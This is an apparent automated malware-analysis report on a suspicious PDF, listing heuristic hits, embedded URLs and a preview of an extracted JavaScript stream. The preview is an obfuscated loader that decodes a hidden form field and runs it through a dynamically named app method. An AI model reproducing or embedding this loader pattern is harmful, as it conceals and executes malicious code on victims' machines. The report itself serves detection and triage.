SUSPICIOUS
50
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9977
Heuristics 4
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0106_000.js |
pdf-javascript-stream | PDF /JS object 106 at offset 0x4C38 | 1427 bytes |
SHA-256: 0e5e5d6d529e0ba9e3cc1862a63dd2459c2a675a5f7d5e650670f78e29c1ae19 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
20 of 38 identifiers look randomly generated (e.g. 'kjghftefa2oiuwgf78awtfe6789qt34789tfg789') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ergrewgregerg = "f"+"g"+"hijk";
var xcvbergger34gr = ':AB'+'CDEFG';
var bxcvn45tygsre = "UVWXYZ{}";
var rve34f3ewsg = "()[]^abc"+"de";
var ouypr5ujhrds = 'pqrs'+'tuvwxyz_';
var yuyti6kyui567y7r = '456'+'78';
var ndgsb34egvw4e = '"=<'+'>&\\';
function xzcbcvb53gerg(xcbcvbn54tygre){
var xbcv3gferg="";
var cxvbdg54gr4e = 39;
for (var i = 0;i<xcbcvbn54tygre.length-(15-14);i++)
{var gretg345ge = xcbcvbn54tygre[i];
var ghuidysgfoits34b=vfbef34few.indexOf(gretg345ge)-cxvbdg54gr4e;
var cvxn53tgr4eg= ghuidysgfoits34b+vfbef34few.length;
if (ghuidysgfoits34b<(10-10)){ghuidysgfoits34b=cvxn53tgr4eg}
xbcv3gferg += vfbef34few.charAt(ghuidysgfoits34b)}
return xbcv3gferg;}
var cvnbv54ywefsw = '9/!%+-*'+'.,;';
var saafrgrt54gred = ergrewgregerg+"lm"+"no"+ouypr5ujhrds+'0123'+yuyti6kyui567y7r+cvnbv54ywefsw+ndgsb34egvw4e;
var kjiuotynj4htre = "QRST"+bxcvn45tygsre+' '+rve34f3ewsg+saafrgrt54gred;
var mkiuoyj56rhr = xcvbergger34gr +'HIJKLMNOP';
var bn45tygder = mkiuoyj56rhr+kjiuotynj4htre;
var vfbef34few =bn45tygder;
var dsaasdfg54gred=getField("WSWSWS");
var mnbmt56hdretg=dsaasdfg54gred.value;
var poiuytrfj5r6hr = xzcbcvb53gerg(mnbmt56hdretg);
var tgbtgnyhunjy = "hauaiyh9iryh98wyf98awyf89sdayfp89aewyf89wey9wev"+"alrgwrgqr3ewgergvaebgegaehergg";
var kjghftefa2oiuwgf78awtfe6789qt34789tfg789wrtf789ewtfw789qe6f789 = tgbtgnyhunjy.substr(45,4);
app[kjghftefa2oiuwgf78awtfe6789qt34789tfg789wrtf789ewtfw789qe6f789](poiuytrfj5r6hr);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.